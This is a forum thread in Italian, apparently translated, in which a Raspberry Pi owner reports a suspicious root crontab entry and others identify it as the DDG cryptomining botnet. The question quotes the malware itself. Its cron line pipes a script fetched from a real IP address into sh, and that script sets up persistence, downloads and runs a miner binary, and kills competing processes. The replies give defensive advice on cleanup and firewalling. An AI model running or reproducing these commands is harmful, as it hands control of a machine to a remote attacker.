Voce crontab sospetta che esegue "xribfa4" ogni 15 minuti

Volevo aggiungere qualcosa al mio file crontab di root sul mio Raspberry Pi, e ho trovato una voce che mi sembra sospetta, cercando parti di esso su Google non ha trovato nulla.

Voce Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

I contenuti di http://103.219.112.66:8000/i.shsono:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

La mia conoscenza di Linux è limitata, ma a me sembra che scaricare binari da un server indonesiano ed eseguirli come root regolarmente non sia una cosa normale.

Cos'è questo? Cosa dovrei fare?

security cron malware

— Peter Dam
fonte

È circolare. Ogni 15 minuti scarica e installa una nuova copia di se stesso. Se / quando la copia sul server remoto viene modificata, tutti i server che eseguono questo cronjob eseguiranno qualunque sia il nuovo codice, entro 15 minuti.

— Carattere jolly

Il tuo lampone pi è aperto su Internet? Qual è il tuo raspberry pi in esecuzione? Questo è l'unico risultato su Google quando cerco xribfa4. Se non si esegue software che deve eseguire questa operazione, è probabile che si tratti di un virus.

— kemotep,

@kemotep quella stringa è casuale, ma google per l'IP e dà alcuni risultati. Qualcosa su una botnet di mining ddg

— frostschutz,

L'ho trovato. È folle che l'IP sia registrato su un sito del governo indonesiano. Sembra anche che ci siano quasi 2000 altri ips che consegnano questo payload.

— kemotep,

La cosa principale di cui devi essere consapevole è che anche se rimuovi quella voce crontab, il tuo sistema molto probabilmente ha ancora la vulnerabilità che gli ha permesso di essere infettato. Devi trovare e correggere quella vulnerabilità.

— Hans-Martin Mosner,

Risposte:

È una botnet di mining DDG, come funziona:

sfruttando una vulnerabilità RCE
modifica del crontab
scaricare il programma di mining appropriato (scritto con go)
avviare il processo di mining

DDG: una botnet di data mining rivolta ai server di database

SystemdMiner quando una botnet prende in prestito l'infrastruttura di un'altra botnet

U&L: come posso uccidere malware minerd su un'istanza di AWS EC2? (server compromesso)

— GAD3R
fonte

Sì, in realtà sembra che sia così. Grazie! Contrassegnerà questa come una risposta, se non arrivano novità.

— Peter Dam,

Non dimenticare i soliti consigli per una macchina radicata: prova a capire come sono entrati in modo da poter riparare il buco. Impara da questo e aumenta la tua sicurezza. Infine, annulla e reinstalla la macchina.

— marzo

La buona notizia è che non sembrano avere un minatore per il Pi, solo per i686 e x86_64.

— Segna il

@Mark Com'è questa buona notizia? Qualcuno ha ottenuto il pieno controllo del proprio Pi utilizzando un punto di ingresso sconosciuto e ha avuto pieno accesso a tutti i segreti sul Pi (incluso ma non limitato alle password). Se il minatore corre o meno è davvero nel regno del "piccolo inconveniente".

— marzo

@marcelm, l'attaccante ha ottenuto il pieno controllo su di esso, e quindi quasi certamente non ha fatto nulla di significativo con quel controllo.

— Segna il

Scopri quali porte TCP e UDP sono effettivamente necessarie, quindi blocca tutte le altre porte nel firewall del router. Probabilmente , quelle voci crontab non riappaiono.

Puoi vedere quali porte sono aperte e pubbliche usando Shields Up! funzione su grc.com .

— Mike Waters
fonte

Oppure potrebbe correggere la vulnerabilità.

— Harper - Ripristina Monica il

@Harper Absolutely! Questo è un dato. Stavo pensando che forse senza prima bloccare le porte inutilizzate, potrebbe essere reinfettato mentre cercava di ripararlo.

— Mike Waters,

Commento pertinente di security.SE: security.stackexchange.com/questions/147770/…

— Wildcard

Questo (non limitandosi a solo TCP e UDP, comunque), sempre. Anche modello di sicurezza positivo, whitelist o nega per impostazione predefinita - nega tutto il traffico che non usi esplicitamente o di cui hai bisogno - l'unico modo per garantire che nessuno dei tuoi buchi sia esposto alla penetrazione.

— antichris,